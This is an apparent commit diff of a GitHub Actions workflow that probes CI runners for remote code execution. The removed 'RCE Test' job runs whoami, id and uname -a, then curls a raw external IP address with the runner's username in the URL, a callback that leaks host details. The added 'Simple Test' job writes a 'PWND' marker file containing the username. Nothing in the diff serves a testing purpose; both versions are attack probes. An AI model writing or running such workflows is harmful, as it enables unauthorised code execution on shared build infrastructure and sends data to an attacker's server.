@@ -1,12 +1,8 @@
|
||||
name: RCE Test
|
||||
name: Simple Test
|
||||
on: [push]
|
||||
jobs:
|
||||
rce:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Execute Command
|
||||
run: |
|
||||
whoami
|
||||
id
|
||||
uname -a
|
||||
curl http://202.79.169.91:28016/$(whoami)
|
||||
- name: Simple Echo
|
||||
run: echo "PWND_$(whoami)" > /tmp/pwn.txt
|
||||
|
||||
Reference in New Issue
Block a user